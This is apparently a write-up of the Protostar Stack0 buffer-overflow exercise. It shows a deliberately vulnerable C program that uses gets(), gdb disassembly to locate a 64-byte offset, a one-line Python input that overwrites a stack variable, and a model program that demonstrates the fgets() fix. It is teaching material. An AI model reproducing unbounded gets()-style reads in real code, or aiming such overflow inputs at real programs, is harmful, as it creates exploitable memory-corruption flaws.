# Protostar :: Stack0

Here is the code for this particular exercise.

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
```

The solution is pretty simple. First we need to find the offset between the start of `buffer` and the `modified` variable. We can then set `modified` to anything but 0 in order to get the program to take the branch we want. Let's start by finding this offset. Note that I've added some comments to the disassembly to make it easier to follow.

```
$ gdb stack0
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60

# modified = 0
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0

# gets(buffer)
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>

# if (modified != 0)
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>

# if modified == 0
# printf("Try again?\n");
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>

# if modified != 0
# printf("you have changed the 'modified' variable\n");
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>

0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.
```

So we can see that the `modified` variable is located at `esp + 0x5c` and `buffer` is located at `esp + 0x1c`. The offset is therefore `0x5c - 0x1c = 0x40`, or 64 bytes (unsurprisingly, exactly the length of the buffer). So we need to write 64 bytes of data to fill up the buffer, plus one more byte, which lands in the lowest byte of `modified` and makes it non-zero.

```console
$ python -c 'print "A" * 64 + "B"' | ./stack0
you have changed the 'modified' variable
```
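As an added illustration (not part of the original writeup or of the Protostar source), the C program below models the 0x60-byte frame from the disassembly above and replays `gets()` over it, so the offset arithmetic can be checked without running the vulnerable binary. The `model_read` and `modified_after` helpers are my own; with `limit == 0` they mimic the unbounded `gets()`, and with `limit == 64` they mimic a bounded `fgets(buffer, sizeof buffer, stdin)` as the obvious fix. It also shows the edge case the one-liner skips past: exactly 64 bytes leave `modified` untouched, because the NUL that `gets()` appends is what lands there.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout from the disassembly: `sub esp,0x60`; buffer at [esp+0x1c], modified at [esp+0x5c]. */
#define FRAME_SIZE   0x60
#define BUFFER_OFF   0x1c
#define MODIFIED_OFF 0x5c
#define BUFFER_LEN   (MODIFIED_OFF - BUFFER_OFF)   /* 0x40 == 64 */
#define MAX_INPUT    128                           /* cap on constructed inputs */

/* Model of the read. limit == 0 behaves like gets(): copy up to the first '\n'
 * with no bound, then append a NUL. limit > 0 behaves like fgets(buffer, limit,
 * stdin): at most limit - 1 bytes are stored, so the NUL stays inside buffer. */
static void model_read(uint8_t *frame, const char *input, size_t limit)
{
    size_t n = strcspn(input, "\n");
    if (limit && n > limit - 1) n = limit - 1;
    memcpy(frame + BUFFER_OFF, input, n);
    frame[BUFFER_OFF + n] = '\0';
}

/* modified as the little-endian dword that `mov eax,DWORD PTR [esp+0x5c]` loads. */
static uint32_t read_modified(const uint8_t *f)
{
    return (uint32_t)f[MODIFIED_OFF] | (uint32_t)f[MODIFIED_OFF + 1] << 8
         | (uint32_t)f[MODIFIED_OFF + 2] << 16 | (uint32_t)f[MODIFIED_OFF + 3] << 24;
}

/* Feed `fill` copies of 'A' followed by `tail` through model_read on a fresh frame
 * (modified = 0) and return what modified holds afterwards. The frame carries
 * MAX_INPUT bytes of slack so the unbounded model stays inside this program's memory. */
uint32_t modified_after(size_t fill, const char *tail, size_t limit)
{
    char input[MAX_INPUT];
    uint8_t frame[FRAME_SIZE + MAX_INPUT] = {0};
    if (fill + strlen(tail) >= MAX_INPUT)
        return 0xffffffffu;                    /* constructed input too long for the model */
    memset(input, 'A', fill);
    strcpy(input + fill, tail);
    model_read(frame, input, limit);
    return read_modified(frame);
}

int main(void)
{
    printf("gets,  64 x 'A'       -> 0x%08x\n", (unsigned)modified_after(64, "", 0));
    printf("gets,  64 x 'A' + 'B' -> 0x%08x\n", (unsigned)modified_after(64, "B", 0));
    printf("fgets, 64 x 'A' + 'B' -> 0x%08x\n", (unsigned)modified_after(64, "B", BUFFER_LEN));
    return 0;
}
```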